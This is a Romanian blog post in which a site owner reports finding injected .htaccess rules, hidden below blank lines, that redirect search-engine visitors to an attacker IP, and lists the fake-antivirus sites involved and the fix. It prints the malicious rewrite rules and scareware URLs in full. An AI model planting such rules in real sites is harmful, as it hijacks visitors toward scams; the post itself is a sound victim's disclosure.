Redirectare neautorizate - cod malware

Insa nu stiu pentru cata vreme (ore, zile, luni). E vorba despre codul ce-l suspectam a-l avea scris intr-un fisier de pe blog. Numai ca nu e vorba despre un cod JavaScript ci unul ce vizeaza serverul Apache (nu stiu ce limbaj), scris intr-un fisier special denumit .htaccess . Mai exact e vorba de urmatorul cod:

RewriteEngine On RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC] RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

pe care l-am gasit scris sub 66 de linii (ca sa para gol) in fisierul .htaccess al fiecarui site pe care-l am.

cod malitios .htaccess exploit antivirus 2009

Noroc ca am cautat pe Google cu “redirect, nu=880865” (terminatia paginii catre care eram redirectionat) si am dat de un site in care se scria despre problema ce afecteaza, se pare, mii de site-uri. Redirectionarea se realizeaza de obicei catre unul din site-urile:

http://89.28.13 .204/in.html?s=xx
http://wwwinfoclick .com/soft.php?aid=0865&d=1&product=XPA&refer=ff94bbac7
http://defense-live-scan .com/2009/1/freescan.php?nu=880865

http://defense-live-scan .com/2009/1/en/freescan.php?id=880865

http://virusandspywarescaning.com/2009/1/en/_freescan.php?nu=880865

Codul de mai sus, responsabil de redirectare,  l-am inlocuit cu

RewriteEngine Off

iar spre fericirea mea am scapat cel putin temporar de problema redirectionarii neautorizate. Acum astept recomandarile celor de la BitDefender pentru a-mi securiza fisierul .htaccess, desi ma gandesc ca singura cale este de a-mi pastra PC-ul safe si clean si schimba parolele de logare. Daca e mai mult de atat… momentan ma depaseste.

Similar Posts: